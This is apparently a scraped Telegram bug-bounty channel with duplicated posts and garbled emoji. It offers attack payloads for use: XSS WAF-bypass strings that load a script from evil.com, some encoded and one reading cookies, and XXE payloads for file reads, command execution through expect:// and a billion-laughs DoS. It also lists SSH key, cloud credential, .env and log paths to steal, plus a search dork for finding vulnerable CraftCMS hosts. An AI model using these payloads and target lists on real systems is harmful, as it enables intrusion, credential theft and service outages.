DarkShadow truly remembers all of you:
Guys, some very interesting topics are coming soon about Advance XSS, leaking credentials to RCE, Google XSS POC, XXE to RCE, and more.Show your love, guys!
1. Learn less, practice more.
2. Tools are nothing without core knowledge.
3. Chasing basic bugs won't make you elite.
4. Pro hunters create new exploits, not copy old ones.
5. Think beyond checklists β think like an attacker.
Guys, some very interesting topics are coming soon about Advance XSS, leaking credentials to RCE, Google XSS POC, XXE to RCE, and more.
β€44π5π₯5π€2π«‘1
CVE-2025-32432: RCE in CraftCMS, 10.0 rating π₯π₯π₯
0-day vulnerability makes some versions of CraftCMS vulnerable to RCE. Used in the wild in combination with CVE-2024-58136.
Search at Netlas.io:
π Link: https://nt.ls/XVVPd
π Dork: http.headers.x_powered_by:"Craft CMS"
Vendor's advisory: https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3
0-day vulnerability makes some versions of CraftCMS vulnerable to RCE. Used in the wild in combination with CVE-2024-58136.
Search at Netlas.io:
π Link: https://nt.ls/XVVPd
π Dork: http.headers.x_powered_by:"Craft CMS"
Vendor's advisory: https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3
β€12π3π₯2
Please open Telegram to view this post
VIEW IN TELEGRAM
π10π₯5
Hello Hunters,
DarkShadow here, back again with a quick tip and a heads-up: you might encounter SSRF vulnerabilities in email-sending features!
Take a look at these screenshots β the website actively validates emails to block temporary email addresses. However, when I used Burp Collaborator as the email input, I received DNS, SMTP, and even HTTP responses!
This demonstrates that during pentesting, instead of relying on temporary mail services, you should always use Burp Collaborator to uncover hidden vulnerabilities.
Stay sharp and hunt smarter!
Follow meππΌ DarkShadow
#bugbountytips@brutsecurity #ssrf
DarkShadow here, back again with a quick tip and a heads-up: you might encounter SSRF vulnerabilities in email-sending features!
Take a look at these screenshots β the website actively validates emails to block temporary email addresses. However, when I used Burp Collaborator as the email input, I received DNS, SMTP, and even HTTP responses!
This demonstrates that during pentesting, instead of relying on temporary mail services, you should always use Burp Collaborator to uncover hidden vulnerabilities.
Stay sharp and hunt smarter!
Follow meππΌ DarkShadow
#bugbountytips@brutsecurity #ssrf
πΏ12π10β€9π₯7
Please open Telegram to view this post
VIEW IN TELEGRAM
π€16π9π₯6
Hey Hunters,
DarkShadow hereβdropping a quick tip for your next XSS hunt!
Tired of firewalls blocking alert(), prompt(), or confirm()? Use
Try these sneaky XSS payloads:
Blind Payloads:
Encoded Variants:
Evil Payload.js Example:
Hope these payloads help you understand how to bypass firewalls that block your payloads, even when an XSS vulnerability still exists. However, their effectiveness depends on the specific web application and firewall configurations you're testing against.
Want a full XSS WAF Bypass Cheat Sheet? Let me know in the commentsβI'll cook one up!
Follow me ππΌ DarkShadow
#bugbountytips #xss #wafbypass
DarkShadow hereβdropping a quick tip for your next XSS hunt!
Tired of firewalls blocking alert(), prompt(), or confirm()? Use
import() to level up your payload game.Try these sneaky XSS payloads:
import('data:text/javascript;base64,YWxlcnQoJ1hTUyEnKQ==')
// Base64 β alert('XSS!')
import('data:text/javascript,%61lert(document.cookie)')
// %61 = 'a'
Blind Payloads:
<script type="module">import('https://evil.com/payload.js');</script>
<img src=x onerror="import('https://evil.com/payload.js')">
<svg/onload="import('https://evil.com/payload.js')">
(()=>{import('https://evil.com/payload.js')})()
import(/*trick*/'https://evil.com/payload.js')
Encoded Variants:
\u0069\u006d\u0070\u006f\u0072\u0074('https://evil.com/payload.js')
// import as Unicode encoding
<script>import(String.fromCharCode( 104,116,116,112,115,58,47,47,101,118,105,108,46,99,111,109,47,112,97,121,46,106,115));</script>
// https://evil.com/pay.js ASCII decimal encoding
Evil Payload.js Example:
export function pwn() {
alert('DarkShadow is here!');
}
Hope these payloads help you understand how to bypass firewalls that block your payloads, even when an XSS vulnerability still exists. However, their effectiveness depends on the specific web application and firewall configurations you're testing against.
Want a full XSS WAF Bypass Cheat Sheet? Let me know in the commentsβI'll cook one up!
Follow me ππΌ DarkShadow
#bugbountytips #xss #wafbypass
π₯22π8β€5π€1
Certified Red Team Professional (CRTP) - Notes
ππ₯
πhttps://dev-angelist.gitbook.io/crtp-notes
ππ₯
πhttps://dev-angelist.gitbook.io/crtp-notes
π19
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0β9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
Please open Telegram to view this post
VIEW IN TELEGRAM
β€25π9π€1π«‘1
Hey everyone!
Sorry for not being active latelyβbeen dealing with some health stuff. Iβll be back soon with loads of content.
Till then, @darkshadow2bd will keep posting cool stuff here.
Stay tuned and take care!
β Saumadip | Brut Security
Sorry for not being active latelyβbeen dealing with some health stuff. Iβll be back soon with loads of content.
Till then, @darkshadow2bd will keep posting cool stuff here.
Stay tuned and take care!
β Saumadip | Brut Security
β€14π3
π₯XXE to Remote Code Execution (RCE) β Real-World Attack Chainβ‘
Hey Hunters,
DarkShadow hereβdropping a quick tip for your next XXE hunt!
Escalate XXE vulnerability π
1. Basic XXE Payload (Test Injection)
2. RCE via expect:// PHP Wrapper (if enabled)
Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).
3. Local File Read using php://filter
Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective to bypass WAF filters and got any outputs correct format)
4. XML Bomb (DoS)
Effect: Crashes or DoS the XML parser due to entity expansion.
5. Read User Private Keys (SSH)
πPro tip for more recon:
1. Steal AWS / Cloud Credentials via XXE
3. Bash History Abuse
5. Custom Internal Recon via /proc Files
Sometimes exposes secrets in memory or open database connections.
So guys what about my these methodology? If you guy's are really enjoyed, don't forget to show your love β€οΈ
Don't forget to follow me ππΌ DarkShadow
#bugbountytips #xxe
Hey Hunters,
DarkShadow hereβdropping a quick tip for your next XXE hunt!
Escalate XXE vulnerability π
1. Basic XXE Payload (Test Injection)
<?xml version="1.0"?>If the response contains /etc/passwd, the app is XXE vulnerable.
<!DOCTYPE root [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>
2. RCE via expect:// PHP Wrapper (if enabled)
<?xml version="1.0"?>ο»Ώ
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "expect://id">
]>
<root>&xxe;</root>
Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).
3. Local File Read using php://filter
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<foo>&xxe;</foo>
Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective to bypass WAF filters and got any outputs correct format)
4. XML Bomb (DoS)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
Effect: Crashes or DoS the XML parser due to entity expansion.
5. Read User Private Keys (SSH)
Useful Paths to Check:
/home/*/.ssh/id_rsa
/root/.ssh/id_rsa
/etc/ssh/ssh_config
/var/backups/
/proc/self/environ (for creds or keys in memory)
πPro tip for more recon:
1. Steal AWS / Cloud Credentials via XXE
Also check:2. Dump Configs for DB Creds or Secrets
/home/www-data/.aws/credentials
/proc/self/environ (might expose AWS keys, tokens)
Also check:
config.php
.env
db.php
settings.php
wp-config.php (WordPress)
phpmyadmin/config.inc.php (phpmyadmin)
administrator/.env (joomla)
config/services.yaml (Symfony Framework)
app/config.js, app/config.json (nodejs)
settings.py, config.py (Python / Django / Flask)
application.properties, application.yml, web.xml (Java / Spring Boot / JSP Apps)
database.yml (Ruby on Rails)
3. Bash History Abuse
Also check:4. Read Logs for Token Harvesting
.bash_history
Sometimes contains:
MySQL login
Admin tools
SSH commands
Clear-text passwords
Web Server Logs:
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
PHP / App-Specific Logs:
/var/log/php_errors.log
/var/log/php8.1-fpm.log
/var/log/php7.4-fpm.log
/var/log/php5-fpm.log
/var/log/php-fpm/www-error.log
Laravel / Symfony / Framework Logs:
storage/logs/laravel.log
/var/www/html/storage/logs/laravel.log
/var/www/html/app/storage/logs/laravel.log
var/log/dev.log (Symfony)
app/logs/dev.log
Authentication / Session Logs
/var/log/auth.log
/var/log/secure
/var/log/faillog
/var/log/wtmp
/var/log/btmp
/var/log/lastlog
System Logs (May Contain Leaks or Stack Traces):
/var/log/syslog
/var/log/messages
/var/log/dmesg
/var/log/kern.log
Database Logs (If Exposed):
/var/log/mysql/error.log
/var/log/postgresql/postgresql.log
/var/log/mariadb/mariadb.log
5. Custom Internal Recon via /proc Files
Also check:
/proc/self/cmdline
/proc/self/fd/
Sometimes exposes secrets in memory or open database connections.
So guys what about my these methodology? If you guy's are really enjoyed, don't forget to show your love β€οΈ
Don't forget to follow me ππΌ DarkShadow
#bugbountytips #xxe
π19β€15π₯7π€¨1π€1
Itβs lightweight, fast, and helps turn raw recon into insights.
Please open Telegram to view this post
VIEW IN TELEGRAM
β€10π₯6π4